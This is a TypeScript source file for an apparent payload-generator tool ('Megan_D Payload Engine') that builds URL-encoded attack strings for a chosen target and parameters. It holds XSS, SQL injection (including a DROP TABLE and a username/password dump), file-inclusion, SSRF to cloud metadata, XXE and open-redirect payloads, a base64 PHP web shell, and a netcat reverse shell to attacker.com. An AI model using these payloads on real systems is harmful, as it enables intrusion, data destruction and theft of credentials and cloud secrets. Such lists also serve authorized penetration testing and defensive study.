export interface VulnerabilityType {
  id: string;
  name: string;
  description: string;
  icon: string;
}

export interface PayloadConfig {
  type: string;
  target: string;
  parameters: string[];
}

export const vulnerabilityTypes: VulnerabilityType[] = [
  { id: "xss", name: "XSS", description: "Cross-Site Scripting payloads", icon: "🔗" },
  { id: "sqli", name: "SQL Injection", description: "SQL injection test payloads", icon: "💾" },
  { id: "lfi", name: "LFI", description: "Local File Inclusion", icon: "📁" },
  { id: "rfi", name: "RFI", description: "Remote File Inclusion", icon: "🌐" },
  { id: "rce", name: "RCE", description: "Remote Code Execution", icon: "⚡" },
  { id: "ssrf", name: "SSRF", description: "Server-Side Request Forgery", icon: "🔄" },
  { id: "xxe", name: "XXE", description: "XML External Entity", icon: "📄" },
  { id: "redirect", name: "Open Redirect", description: "URL redirect payloads", icon: "➡️" }
];

export function generatePayload(config: PayloadConfig): string {
  const payloads: Record<string, string[]> = {
    xss: [
      `<script>alert('XSS')</script>`,
      `<img src=x onerror=alert('XSS')>`,
      `"><script>alert(String.fromCharCode(88,83,83))</script>`,
      `javascript:alert('XSS')`,
      `<svg/onload=alert('XSS')>`
    ],
    sqli: [
      `' OR '1'='1`,
      `' UNION SELECT NULL,NULL,NULL--`,
      `1; DROP TABLE users--`,
      `' OR 1=1--`,
      `admin'--`,
      `' UNION SELECT username,password FROM users--`
    ],
    lfi: [
      `../../../etc/passwd`,
      `....//....//....//etc/passwd`,
      `/etc/passwd%00`,
      `php://filter/convert.base64-encode/resource=index.php`,
      `php://input`
    ],
    rfi: [
      `http://attacker.com/shell.txt`,
      `http://attacker.com/shell.txt%00`,
      `data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+`
    ],
    rce: [
      `; ls -la`,
      `| cat /etc/passwd`,
      `\`id\``,
      `$(whoami)`,
      `; nc -e /bin/sh attacker.com 4444`
    ],
    ssrf: [
      `http://169.254.169.254/latest/meta-data/`,
      `http://metadata.google.internal/computeMetadata/v1/`,
      `http://internal-server/admin`,
      `file:///etc/passwd`
    ],
    xxe: [
      `<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>`,
      `<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/">]><foo>&xxe;</foo>`
    ],
    redirect: [
      `//attacker.com`,
      `http://attacker.com`,
      `https://attacker.com`,
      `///attacker.com`,
      `\/attacker.com`
    ]
  };

  const typePayloads = payloads[config.type] || payloads.xss;
  let result = `# ${config.type.toUpperCase()} Payloads for ${config.target}\n`;
  result += `# Generated by Megan_D Payload Engine\n\n`;
  result += `Target URL: ${config.target}\n`;
  result += `Parameters: ${config.parameters.join(", ")}\n\n`;
  result += `--- Payloads ---\n\n`;
  
  config.parameters.forEach(param => {
    result += `# Parameter: ${param}\n`;
    typePayloads.forEach((payload, i) => {
      result += `${param}=${encodeURIComponent(payload)}\n`;
    });
    result += `\n`;
  });

  result += `--- Raw Payloads ---\n\n`;
  typePayloads.forEach(payload => {
    result += `${payload}\n`;
  });

  return result;
}